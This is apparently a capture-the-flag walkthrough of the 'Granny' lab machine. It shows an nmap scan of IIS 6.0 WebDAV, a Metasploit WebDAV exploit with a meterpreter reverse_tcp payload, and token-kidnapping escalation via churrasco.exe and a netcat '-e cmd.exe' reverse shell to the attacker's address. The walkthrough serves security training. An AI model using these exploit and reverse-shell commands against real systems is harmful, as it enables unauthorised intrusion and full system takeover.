MACHINE IP — 10.10.10.14
NMAP
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-ntlm-info:
| Target_Name: GRANNY
| NetBIOS_Domain_Name: GRANNY
| NetBIOS_Computer_Name: GRANNY
| DNS_Domain_Name: granny
| DNS_Computer_Name: granny
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Date: Tue, 24 Sep 2019 03:01:11 GMT
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)Here we get to see that only http port is open , after visiting http we didn’t get much information that can help us to move in, so let’s search for some exploit of services we got from the NMAP
After searching for a while we get to know that there is a metasploit exploit which can help us in getting shell
use exploit/windows/iis/iis_webdav_scstoragepathfromurlset rhost 10.10.10.14set payload windows/meterpreter/reverse_tcpset lhost 10.10.14.2run
Using this exploit we get a reverse shell
Here we are just a normal user “nt authority\network service” and now all we have to do is to do privilege escalation to system authority
………………………..PRIVILEGE ESCALATION………………………………..
Here we are ‘nt authoriy\ network service’ and got the way to privilege escalation from token-kidnapping
Let’s get a file from our local system to our target system
upload /usr/share/sqlninja/apps/churrasco.exechurrasco.exe converts our command to system command then then follow the the command as given , we can use this to for getting a reverse shell of system authority
As we are having meterpreter shell it won’t be so difficult for us to move file to our target system use command to move file to our target system
And now we upload nc.exe for getting a reverse shell
upload /usr/share/sqlninja/apps/nc.exeNOTE :- make sure you are having both nc.exe and churrasco.exe in same directory i had them in C:\WINDOWS\TEMP
Here now let’s move to cmd shell instead of meterpreter shell by using shell command in meterpreter for having windows cmd shell,Now run below command for getting a shell at our local system
churrasco.exe “nc.exe 10.10.14.2 1234 -e cmd.exe”
And here we got our system shell and our nc listner
Now we can access whole system without any restrictions
………………………………cowabunga…………………………………..
